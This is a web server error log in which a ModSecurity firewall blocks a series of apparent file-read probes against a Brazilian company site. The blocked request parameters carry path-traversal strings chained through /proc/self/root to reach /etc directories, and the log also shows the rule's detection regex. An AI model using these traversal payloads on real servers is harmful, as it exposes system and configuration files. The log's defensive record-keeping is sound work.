[Wed Mar 18 14:53:55.759221 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:44742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrms0zinOy1jxa1j4dHHAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:57.075184 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:44756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmtda6ubjKNq_cu4bKVQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:57.843402 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:44504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmtQkwaGbbGflqUZA-zwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:53:59.435020 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:43610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmtwbLMZ6AikZjR9XrkgAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:02.106537 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:43620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmuEzinOy1jxa1j4dHHgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:03.706376 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:43622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmu-oXxyEfFpUF8f-fhQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:05.117594 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:43624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmvUzinOy1jxa1j4dHHwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:06.489285 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:43638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmvta6ubjKNq_cu4bKYgAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:07.829229 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:44508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmv-w_le52K8_3pV0ItgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:54:07.886821 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:39668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmvwbLMZ6AikZjR9XrlgAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:09.296901 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:39678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmwQbLMZ6AikZjR9XrmQAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:54:12.631274 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:52002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmxAkwaGbbGflqUZA-2wAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:54:35.063271 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:56528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrm2-oXxyEfFpUF8f-frwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:54:51.576086 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:50446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrm6ymAPhZkrhU8w4mYZwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:55:01.060646 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:52142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrm9da6ubjKNq_cu4bKjgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:55:01.497898 2026] [mime_magic:error] [pid 17887:tid 140411649607424] (70014)End of file found: [client 57.141.18.61:49142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:55:08.607319 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:34140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrm_CmAPhZkrhU8w4mYcAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:55:23.835849 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:39686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnCwkwaGbbGflqUZA_PwAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:26.083143 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:49922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnDfu8EFLIOrSqIpstjQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:27.508456 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:48160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnDymAPhZkrhU8w4mYewAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:29.734554 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:48166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnEOyqAr6etmhZHNr1FAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:31.393914 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:48172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnEymAPhZkrhU8w4mYfAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
